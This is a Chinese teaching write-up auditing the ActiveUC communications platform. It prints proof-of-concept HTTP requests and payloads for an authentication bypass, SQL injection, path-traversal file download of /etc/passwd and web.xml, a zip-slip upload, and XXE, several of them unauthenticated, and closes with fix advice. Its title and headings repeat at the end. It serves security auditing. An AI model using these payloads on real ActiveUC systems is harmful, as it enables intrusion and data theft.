网动统一通信平台ActiveUC代码审计分析教学文档<\/h1>

1. 系统概述<\/h2>
网动统一通信平台（ActiveUC）是由北京网动网络科技股份有限公司开发的企业级通信平台，集成文字、语音、视频等多种沟通方式。该系统采用Struts2框架开发，使用iBATIS和JDBC两种数据库操作方式。<\/p>

2. 鉴权机制分析<\/h2>

2.1 拦截器配置<\/h3>

系统通过Struts2拦截器实现鉴权机制，定义了三类拦截器：<\/p>

global拦截器栈<\/strong>：<\/p>

包含pagerInterceptor和exceptionInterceptor<\/li>
继承框架内置的defaultStack<\/li>
pagerInterceptor功能：从HTTP请求提取分页偏移量、页面大小和语言设置<\/li>
exceptionInterceptor功能：捕获未处理异常，返回500错误响应<\/li> <\/ul>
globalAndVerify拦截器<\/strong>：<\/p>

包含verifyLogInfoInterceptor和pagerInterceptor<\/li>
verifyLogInfoInterceptor：检查session中是否存在logonInfo记录<\/li> <\/ul>
globalAndVerifyForCall拦截器<\/strong>：<\/p>

使用VerifyUserInfoInterceptor<\/li>
检查session中是否存在userInfo对应的用户记录<\/li> <\/ul>
2.2 鉴权绕过漏洞<\/h3>
UserFilter.java中的白名单绕过<\/strong>：<\/p>

白名单验证使用contains()方法进行模糊匹配<\/li>
漏洞利用：可通过路径遍历绕过验证<\/li>
示例：\/downloads\/..\/admin\/info<\/code>可绕过白名单检查<\/li> <\/ul> 3. SQL注入漏洞分析<\/h2> 3.1 漏洞位置<\/h3> 文件<\/strong>：UserImportTemp.xml中的listUserImportTempByTemps方法问题代码<\/strong>：使用非预编译的$参数写法<\/p> <\/span> <\/span><\/span><select<\/span> id=<\/span>"listUserImportTempByTemps"<\/span> parameterClass=<\/span>"java.util.Map"<\/span> resultClass=<\/span>"java.util.HashMap"<\/span>><\/span> <\/span><\/span> SELECT * FROM user_import_temp WHERE PK_TEMP = '$temps$' <\/span><\/span><\/select><\/span> <\/span><\/span><\/code><\/pre>3.2 漏洞调用链<\/h3> UserAction.java中的exportUsers方法：<\/p> public<\/span> String exportUsers<\/span>()<\/span> {<\/span> <\/span><\/span> String temps =<\/span> request.<\/span>getParameter<\/span>(<\/span>"temps"<\/span>);<\/span> \/\/ 用户可控参数 <\/span><\/span><\/span><\/span> \/\/ 直接传递给SQL查询 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3.3 访问限制<\/h3> 该Action继承globalAndVerify拦截器<\/li> 需要登录后才能利用<\/li> <\/ul> 4. 任意文件下载漏洞<\/h2> 4.1 第一处漏洞<\/h3> 位置<\/strong>：DownloadTask.java中的RenderDownloadFile方法触发方法<\/strong>：UserAction.java中的downloadUserTemplate方法漏洞代码<\/strong>：<\/p> String path =<\/span> request.<\/span>getParameter<\/span>(<\/span>"filePath"<\/span>);<\/span> <\/span><\/span>String realpath =<\/span> absolutePath +<\/span> path;<\/span> \/\/ 路径拼接 <\/span><\/span><\/span><\/code><\/pre>POC<\/strong>：<\/p> POST<\/span> \/acenter\/user!RenderDownloadFile.action HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span>Content-Length:<\/span> 37<\/span> <\/span><\/span> <\/span><\/span>filePath=..\/..\/..\/..\/..\/..\/etc\/passwd <\/span><\/span><\/code><\/pre>访问限制<\/strong>：需要鉴权<\/p> 4.2 第二处漏洞（高危）<\/h3> 位置<\/strong>：DownloadTask.java中的streamDownloadFile方法触发方法<\/strong>：MeetingAction.java中的downloadDocument方法漏洞代码<\/strong>：<\/p> String filepath =<\/span> request.<\/span>getParameter<\/span>(<\/span>"filePath"<\/span>);<\/span> <\/span><\/span>\/\/ 直接传递给文件下载方法 <\/span><\/span><\/span><\/code><\/pre>关键发现<\/strong>：MeetingShowAction.java中的downloadDocument方法<\/p> 未继承任何权限拦截器<\/li> 可前台直接访问<\/li> <\/ul> POC<\/strong>：<\/p> GET<\/span> \/acenter\/meetingShow!downloadDocument.action?filePath=WEB-INF\/web.xml HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span><\/code><\/pre>5. 前台文件上传漏洞<\/h2> 5.1 漏洞位置<\/h3> 文件<\/strong>：VersionAction.java中的editVersion方法上传逻辑<\/strong>：<\/p> 获取原始文件名和后缀<\/li> 检查是否为zip或apk格式<\/li> 调用fileUpload.uploadAndUnzip方法处理<\/li> <\/ol> 5.2 漏洞详情<\/h3> 解压过程问题<\/strong>：<\/p> 使用ZipUtils.Unzip方法解压<\/li> 仅校验文件名不能包含"jsp"或"jspx"<\/li> 未校验路径遍历字符（如..\/）<\/li> 可覆盖系统关键文件<\/li> <\/ul> Windows特性利用<\/strong>：<\/p> 可使用::$DATA<\/code>等特殊字符绕过校验<\/li> <\/ul> 5.3 访问权限<\/h3> 对应的Action未配置鉴权拦截器<\/li> 可前台直接访问<\/li> <\/ul> POC<\/strong>：<\/p> POST<\/span> \/acenter\/versionCtr!editVersion.action HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span>Content-Type:<\/span> multipart\/form-data; boundary=----WebKitFormBoundarywwCSm8qxaqfd10tO<\/span> <\/span><\/span> <\/span><\/span>------WebKitFormBoundarywwCSm8qxaqfd10tO <\/span><\/span>Content-Disposition: form-data; name="APP" <\/span><\/span>3 <\/span><\/span>------WebKitFormBoundarywwCSm8qxaqfd10tO <\/span><\/span>Content-Disposition: form-data; name="fileUpload.file"; filename="test.zip" <\/span><\/span>Content-Type: application\/x-zip-compressed <\/span><\/span> <\/span><\/span>[ZIP文件内容] <\/span><\/span><\/code><\/pre>6. 前台XXE漏洞<\/h2> 6.1 漏洞位置<\/h3> 文件<\/strong>：CheckUserAction.java 漏洞代码<\/strong>：<\/p> String AuthorizedInfo =<\/span> request.<\/span>getParameter<\/span>(<\/span>"AuthorizedInfo"<\/span>);<\/span> <\/span><\/span>Document doc =<\/span> DocumentHelper.<\/span>parseText<\/span>(<\/span>AuthorizedInfo);<\/span> \/\/ 直接解析用户输入 <\/span><\/span><\/span><\/code><\/pre>6.2 漏洞特性<\/h3> 使用DocumentHelper.parseText解析XML<\/li> 输入参数完全用户可控<\/li> 存在XXE注入风险<\/li> <\/ul> 6.3 访问权限<\/h3> 继承global拦截器（仅基础功能）<\/li> 无鉴权限制，可前台触发<\/li> <\/ul> POC示例<\/strong>：<\/p> <?xml version="1.0"?><\/span> <\/span><\/span><!DOCTYPE test [ <\/span><\/span><\/span><!ENTITY xxe SYSTEM "file:\/\/\/etc\/passwd"><\/span> <\/span><\/span>]> <\/span><\/span><test><\/span>&xxe;<\/test><\/span> <\/span><\/span><\/code><\/pre>7. 总结与防护建议<\/h2> 7.1 主要漏洞类型<\/h3> 鉴权绕过漏洞<\/li> SQL注入漏洞（iBATIS配置问题）<\/li> 任意文件下载（路径遍历）<\/li> 不安全文件上传（解压漏洞）<\/li> XXE注入漏洞<\/li> <\/ol> 7.2 修复建议<\/h3> 鉴权修复<\/strong>：使用精确匹配代替contains()方法<\/li> SQL注入<\/strong>：统一使用预编译语句<\/li> 文件操作<\/strong>：规范化路径处理，禁用路径遍历<\/li> 文件上传<\/strong>：加强文件类型和内容校验<\/li> XXE防护<\/strong>：禁用外部实体解析<\/li> <\/ol> 7.3 审计重点<\/h3> Struts2拦截器配置<\/li> iBATIS中$符号的使用<\/li> 用户输入直接用于文件操作<\/li> XML解析器的安全配置<\/li> 白名单验证机制的实现方式<\/li> <\/ul> 本教学文档详细分析了ActiveUC系统的安全漏洞，可作为代码审计和安全开发的参考材料。<\/p>

网动统一通信平台ActiveUC代码审计分析教学文档<\/h1>

1. 系统概述<\/h2> 网动统一通信平台（ActiveUC）是由北京网动网络科技股份有限公司开发的企业级通信平台，集成文字、语音、视频等多种沟通方式。该系统采用Struts2框架开发，使用iBATIS和JDBC两种数据库操作方式。<\/p>

2. 鉴权机制分析<\/h2>

3. SQL注入漏洞分析<\/h2>

4. 任意文件下载漏洞<\/h2>

5. 前台文件上传漏洞<\/h2>

6. 前台XXE漏洞<\/h2>

7. 总结与防护建议<\/h2>

1. 系统概述<\/h2>
网动统一通信平台（ActiveUC）是由北京网动网络科技股份有限公司开发的企业级通信平台，集成文字、语音、视频等多种沟通方式。该系统采用Struts2框架开发，使用iBATIS和JDBC两种数据库操作方式。<\/p>